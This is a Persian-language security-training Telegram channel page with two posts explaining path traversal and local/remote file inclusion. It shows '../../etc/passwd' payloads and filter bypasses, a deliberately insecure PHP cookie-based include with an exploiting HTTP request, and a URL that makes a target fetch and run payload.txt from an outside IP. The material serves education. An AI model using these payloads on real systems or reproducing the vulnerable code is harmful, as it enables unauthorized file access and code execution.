Security hint
4.54K subscribers
75 photos
2 videos
18 files
187 links
🔥Security training

🎯 قراره روشن کننده مسیرتون باشیم.

یوتیوب: www.youtube.com/@sec_hint

اپارات: aparat.com/sec_hint

گیت‌هاب: https://github.com/sechint

ادمین:
@adm_sec_hint
Download Telegram
🕷Path Traversal
که به Directory Traversal هم معروف است. این امکان رو به هکر میدهد که به هر فایل و دایرکتوری دلخواه روی وب اپلیکیشن دسترسی پیدا کند. و فایل های سرور را تغییر دهد.
چطوری میتوان تست کرد :
با بررسی سورس صفحه و تست لینک های عکس ها و فایل هایی که در سورس موجود هست. مثلا این لینک را مشاهده کردید
http://example.com/view?picture=image.png
با استفاده از /.. در سرور لینوکسی و \.. در سرور ویندوزی میتوان در دایرکتوری ها پیمایش کرد و به فایل و دایرکتوری خاصی رسید مثلا
http://example.com/view?picture=../../etc/passwd

بعضی مواقع /.. فیلتر میشود باید انرا بایپس کرد :
1-....//....//etc/passwd
2-use URL encoding
3-start of path validation
یک کد نا امن که باعث ایجاد این آسیب پذیری می شود:
<?php
$template= 'example.php';
if (is_set($_COOKIE['template']))
$template= $_COOKIE['template'];
incude("/home/users/phpguru/template".$template);


که با فرستادن درخواست زیر میتوان به فایل مهم etc/passwd دسترسی پیدا کرد
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

#vulnerabilities #path_treversal

@sec_hint
👍5
🔺تکمیلی پست قبل
آسیب پذیری LFI یا (Local File Inclusion) بسیار شبیه Path traversal است. (روش تست و بایپس ) اما تفاوت ریزی دارند:
در LFI شما میتونید هم به فایل های داخل سرور دسترسی پیدا کنید و اجرا (execute) کنید و هم فایل های سرور دیگری را اجرا کنید :
مثلا شما در سرور خود فایلی دارید که اطلاعات phpinfo() را نمایش میدهد حال در سایت آسیب پذیر میتوانید این 👇🏻 تست کنید
http://example.com/view?picture=http://20.20.20.20:8080/payload.txt

که در صفحه سایت payload.txt اجرا میشود و اطلاعات phpinfo نمایش داده میشود.

این درحالی است که درPath traversal فقط فایل های داخل وب سرور سایت را میتوان خواند. (فایلی اجرا (execute) نمیشود)


-چرا از /.. استفاده میشود؟ اگر به پیمایش داخل دایرکتوری های لینوکس آشنایی داشته باشید برای تغییر دایرکتوری یا رفتن به دایرکتوری root از /.. استفاده میشود در این نوع اسیب پذیری ها هم چون در حال پیمایش بین دایرکتوری ها هستیم از این کاراکتر ها استفاده میکنیم و به همین علت هم در سرور های ویندوزی از \.. استفاده میکنیم


#vulnerabilities #path_treversal #LFI

@sec_hint
👍41